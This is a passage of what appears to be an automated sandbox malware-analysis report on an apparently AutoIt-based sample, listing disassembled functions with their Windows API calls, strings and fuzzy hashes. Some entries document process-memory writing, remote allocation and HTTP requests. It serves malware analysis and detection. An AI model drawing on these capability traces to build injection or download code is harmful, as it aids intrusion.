                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Virtual
                                        • String ID:
                                        • API String ID: 4278518827-0
                                        • Opcode ID: 99f5e4ece7a03d6c3e5e7f99eb2d3c35d1c1a042d19cc3020e7723d575f69cbb
                                        • Instruction ID: 22d2346623e5dc092c2c8b866005e223b26ab80f63343ad826a118bf5b021130
                                        • Opcode Fuzzy Hash: 99f5e4ece7a03d6c3e5e7f99eb2d3c35d1c1a042d19cc3020e7723d575f69cbb
                                        • Instruction Fuzzy Hash: B40167B0902B5ABDE3008F6A8C85B52FFB8FF19354F04411BA15C47A42C7F5A864CBE5
                                        Function 003684F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00368504
                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0036851A
                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00368529
                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00368538
                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00368542
                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00368549
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                        • String ID:
                                        • API String ID: 839392675-0
                                        • Opcode ID: 6efda04d60f71da55f87f38d7f899d2ed09892ee0657eb3e9d0a14042a09589e
                                        • Instruction ID: d42a72449877f7eaace689305477ca9ceb857d122924e02c74f319f8366d6ce7
                                        • Opcode Fuzzy Hash: 6efda04d60f71da55f87f38d7f899d2ed09892ee0657eb3e9d0a14042a09589e
                                        • Instruction Fuzzy Hash: 8BF05E72240158BBE7225B629D0EEEF7F7CDFCBB15F000159FA06D1061EBA06A01C6B5
                                        Function 0036A31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • InterlockedExchange.KERNEL32(?,?), ref: 0036A330
                                        • RtlEnterCriticalSection.NTDLL(?), ref: 0036A341
                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,003966D3,?,?,?,?,?,0032E681), ref: 0036A34E
                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,003966D3,?,?,?,?,?,0032E681), ref: 0036A35B
                                          • Part of subcall function 00369CCE: CloseHandle.KERNEL32(?,?,0036A368,?,?,?,003966D3,?,?,?,?,?,0032E681), ref: 00369CD8
                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0036A36E
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 0036A375
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                        • String ID:
                                        • API String ID: 3495660284-0
                                        • Opcode ID: a0e110deeece13ca884857f3dbc93b507564d03f5ef033dc21d8752cdca411be
                                        • Instruction ID: d6a5248818caa74d3cae374d015d484df0b77b02a68b336dd79adaf0099f96f1
                                        • Opcode Fuzzy Hash: a0e110deeece13ca884857f3dbc93b507564d03f5ef033dc21d8752cdca411be
                                        • Instruction Fuzzy Hash: 5BF0E236140201ABD3132B64EC4CEDB7B7DFF8A302F000821F203A58A5CBB89800CF50
                                        Function 0032C320 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 259fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memmove.LIBCMT ref: 0032C419
                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00366653,?,?,00000000), ref: 0032C495
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: FileRead_memmove
                                        • String ID: Sf6
                                        • API String ID: 1325644223-1839599683
                                        • Opcode ID: 7a2b5c10e6e994cd32d1f1cccab5bb758cdc92955fba767b2835c9799c9c8e25
                                        • Instruction ID: e79eb6c5d3a90eb27066880e30b11075825a845e8aa522a88d8c3ff0a2ea4756
                                        • Opcode Fuzzy Hash: 7a2b5c10e6e994cd32d1f1cccab5bb758cdc92955fba767b2835c9799c9c8e25
                                        • Instruction Fuzzy Hash: C3A1EF30A04629EBDF02DF66E880BAEFBB4FF05300F14C595E8659B681D735E961CB91
                                        Function 0033D7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0034010A: std::exception::exception.LIBCMT ref: 0034013E
                                          • Part of subcall function 0034010A: __CxxThrowException@8.LIBCMT ref: 00340153
                                          • Part of subcall function 0032CAEE: _memmove.LIBCMT ref: 0032CB2F
                                          • Part of subcall function 0032BBD9: _memmove.LIBCMT ref: 0032BC33
                                        • __swprintf.LIBCMT ref: 0033D98F
                                        Strings
                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0033D832
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                        • API String ID: 1943609520-557222456
                                        • Opcode ID: a379e83cd3f404bd6eae28f1eeb84aecf270c634a6d6ad776783dce8da2f7ae2
                                        • Instruction ID: b80af39c73365e554eef218fab25945e6001cda5e4738f8d8e91b7bee2320e02
                                        • Opcode Fuzzy Hash: a379e83cd3f404bd6eae28f1eeb84aecf270c634a6d6ad776783dce8da2f7ae2
                                        • Instruction Fuzzy Hash: E3914B311183119FCB16EF24E886D6EB7A8FF99700F01495DF5969B2A1EB30EE04CB52
                                        Function 0037B482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 0037B4A8
                                        • CharUpperBuffW.USER32(?,?), ref: 0037B5B7
                                        • VariantClear.OLEAUT32(?), ref: 0037B73A
                                          • Part of subcall function 0036A6F6: VariantInit.OLEAUT32(00000000), ref: 0036A736
                                          • Part of subcall function 0036A6F6: VariantCopy.OLEAUT32(?,?), ref: 0036A73F
                                          • Part of subcall function 0036A6F6: VariantClear.OLEAUT32(?), ref: 0036A74B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                        • API String ID: 4237274167-1221869570
                                        • Opcode ID: e6799fa4ed6b945a50a209e7754b45ee8e99a0da235fcb493098789981c08f2c
                                        • Instruction ID: 5257bcc0fcf60c674ed83c2dc260e0e6aeac5e36f9d66394d5538c752a5ccb88
                                        • Opcode Fuzzy Hash: e6799fa4ed6b945a50a209e7754b45ee8e99a0da235fcb493098789981c08f2c
                                        • Instruction Fuzzy Hash: AF919E746043019FCB11DF24C485A5ABBF8EFC9710F14882DF88A9B352DB35E945CB52
                                        Function 0038C2E7 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 0038C354
                                        • ScreenToClient.USER32(?,00000002), ref: 0038C384
                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0038C3EA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$ClientMoveRectScreen
                                        • String ID: @U=u
                                        • API String ID: 3880355969-2594219639
                                        • Opcode ID: d330763eab0f1f87f129a135d16b1c6256953aefefc3b276c8b91d114f15dc9d
                                        • Instruction ID: 92fc3f95bad0405ee5da43dd3122a6a068c4c2679cd0c4a226b0843f73212a75
                                        • Opcode Fuzzy Hash: d330763eab0f1f87f129a135d16b1c6256953aefefc3b276c8b91d114f15dc9d
                                        • Instruction Fuzzy Hash: E9518135910204EFCF22EF68C880AAE7BB5FF45320F119199F9159B291D770DD81CBA0
                                        Function 0035D206 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 130windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0035D258
                                        • __itow.LIBCMT ref: 0035D292
                                          • Part of subcall function 0035D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0035D549
                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0035D2FB
                                        • __itow.LIBCMT ref: 0035D350
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$__itow
                                        • String ID: @U=u
                                        • API String ID: 3379773720-2594219639
                                        • Opcode ID: 3fb9f843f7fee5b45215499fd0423810b5752076f2c90f248fd5ce615b03a499
                                        • Instruction ID: b8c939d0d6b5fe179c0586f57705b8daa065779d6caf54ad1f9d0b2206c7ca55
                                        • Opcode Fuzzy Hash: 3fb9f843f7fee5b45215499fd0423810b5752076f2c90f248fd5ce615b03a499
                                        • Instruction Fuzzy Hash: BD41A775A003196BDF23DF54D852FEE7BB9AF49701F000015FA05AB2A1DB749A49CB52
                                        Function 0035CF7F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00364D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0035C9FE,?,?,00000034,00000800,?,00000034), ref: 00364D6B
                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0035CFC9
                                          • Part of subcall function 00364D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0035CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00364D36
                                          • Part of subcall function 00364C65: GetWindowThreadProcessId.USER32(?,?), ref: 00364C90
                                          • Part of subcall function 00364C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0035C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00364CA0
                                          • Part of subcall function 00364C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0035C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00364CB6
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0035D036
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0035D083
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                        • String ID: @$@U=u
                                        • API String ID: 4150878124-826235744
                                        • Opcode ID: 5db71ad44a075a6e95268adf0bd996351c96b2d327d245c1c0650bb795622c9a
                                        • Instruction ID: a793db9a12f9fe0e5b1df916c247e11865244823818d8734f565193b1b335840
                                        • Opcode Fuzzy Hash: 5db71ad44a075a6e95268adf0bd996351c96b2d327d245c1c0650bb795622c9a
                                        • Instruction Fuzzy Hash: B2412D72D00218BEDB11DF94CC85EDEBB78AF45700F108095EA45BB191DA706E49CB61
                                        Function 00361050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 003610B8
                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003610EE
                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003610FF
                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00361181
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                        • String ID: DllGetClassObject
                                        • API String ID: 753597075-1075368562
                                        • Opcode ID: dde41f8053fa5fc8de6a147062d34897ab134f140b90017dcee2d850d049e1b9
                                        • Instruction ID: 6bfdcdf5aae48d17081f33bcf850fbd2796e048b9f73db83101485d437be089f
                                        • Opcode Fuzzy Hash: dde41f8053fa5fc8de6a147062d34897ab134f140b90017dcee2d850d049e1b9
                                        • Instruction Fuzzy Hash: 5B414D71600204AFDB56CF54C884A9A7BA9EF46350F19C4A9EA06DF209D7B5D944CBA0
                                        Function 00365A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00365A93
                                        • GetMenuItemInfoW.USER32 ref: 00365AAF
                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00365AF5
                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,003E18F0,00000000), ref: 00365B3E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Menu$Delete$InfoItem_memset
                                        • String ID: 0
                                        • API String ID: 1173514356-4108050209
                                        • Opcode ID: 6c659dcd290132bd6b274f5bfecda01d9f5a710ee1e4cb4734e6427ebfbdae81
                                        • Instruction ID: ad5dc27669a374bdfad9be1f84a5e68fe8e3da7adb3a5c6372cca5b0c1d6596c
                                        • Opcode Fuzzy Hash: 6c659dcd290132bd6b274f5bfecda01d9f5a710ee1e4cb4734e6427ebfbdae81
                                        • Instruction Fuzzy Hash: 6D41A071204701AFDB22DF24C884B6AB7E8EF89314F05862DF9A59B2D5D770E800CB66
                                        Function 0038B354 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108COMMON
                                        Download Yara Rule
                                        APIs
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0038B3E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: InvalidateRect
                                        • String ID: @U=u
                                        • API String ID: 634782764-2594219639
                                        • Opcode ID: ba8f8da73e9f27926403c1f43fddde7604414de84da290336e300c0cde467e22
                                        • Instruction ID: 6974690beec14174a63598844bd7f13d03ef0dafb8215b44a7f4ca2b2bc99115
                                        • Opcode Fuzzy Hash: ba8f8da73e9f27926403c1f43fddde7604414de84da290336e300c0cde467e22
                                        • Instruction Fuzzy Hash: 4131D234600306FBEF37AF19CC86BA8B768EB06350F558192FA52DB5E2C770E9419B51
                                        Function 00380458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharLowerBuffW.USER32(?,?,?,?), ref: 00380478
                                          • Part of subcall function 00327F40: _memmove.LIBCMT ref: 00327F8F
                                          • Part of subcall function 0032A2FB: _memmove.LIBCMT ref: 0032A33D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memmove$BuffCharLower
                                        • String ID: cdecl$none$stdcall$winapi
                                        • API String ID: 2411302734-567219261
                                        • Opcode ID: c73d800e3d92c06f267a1b2211c9b8e95552c392e4443cb26c21d14b50c597f1
                                        • Instruction ID: 184c0229e5af6d77f50ed658d5075c29b7ace0d9751dec0c22e17eb3092085e7
                                        • Opcode Fuzzy Hash: c73d800e3d92c06f267a1b2211c9b8e95552c392e4443cb26c21d14b50c597f1
                                        • Instruction Fuzzy Hash: 2731E735904619AFCF0AEF58D8409EEB3B5FF05310F10866AE4669B2D1DB31E905CF50
                                        Function 00374A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00374A60
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00374A86
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00374AB6
                                        • InternetCloseHandle.WININET(00000000), ref: 00374AFD
                                          • Part of subcall function 003756A9: GetLastError.KERNEL32(?,?,00374A2B,00000000,00000000,00000001), ref: 003756BE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                        • String ID:
                                        • API String ID: 1951874230-3916222277
                                        • Opcode ID: a28630a5ebb96220e6fccecb5004986d9f4962d01b2e6767b227313795c75e50
                                        • Instruction ID: 38aa0bf74ba028501c2b9d1060850228196afdec9cfe94dc010a27f847425903
                                        • Opcode Fuzzy Hash: a28630a5ebb96220e6fccecb5004986d9f4962d01b2e6767b227313795c75e50
                                        • Instruction Fuzzy Hash: D521CFB6540208BFEB27DF649C85EBFB6ECEB49744F10801AF10AA6140EB68ED058770
